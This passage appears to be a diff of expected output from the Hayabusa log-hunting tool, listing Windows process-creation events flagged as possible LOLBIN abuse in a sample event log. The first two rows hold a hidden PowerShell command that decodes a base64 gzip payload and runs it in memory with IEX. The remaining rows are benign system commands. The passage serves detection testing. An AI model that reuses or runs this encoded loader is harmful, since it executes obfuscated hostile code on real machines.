IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x460 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:40:21.464 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x94c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 06:05:56.876 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 06:06:09.220 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 06:06:09.236 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xff8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 07:54:48.720 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc0c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 07:54:49.720 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 07:54:49.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 07:55:08.329 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb0c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 08:06:57.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x85c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 08:06:57.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcf4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:07:47.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:07:48.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:07:48.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x37c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:08:02.052 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:08:08.052 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:12:51.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x238 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:12:51.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:19:46.662 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:19:47.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:19:47.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:20:06.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:20:16.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3c0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:20:16.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:20:16.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 22:57:54.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 22:57:55.301 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xef8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 22:57:59.004 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x82c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 22:58:15.410 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbbc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 22:59:20.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb24 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 23:01:29.243 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 01:01:36.820 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 01:01:36.883 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 01:01:36.898 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 01:03:36.695 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x68c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 01:57:08.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 02:02:48.677 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xcbc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 02:02:52.614 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:09:55.671 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:09:57.781 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:10:11.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:10:17.702 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:12:20.805 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:12:20.805 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x46c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:47:30.057 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
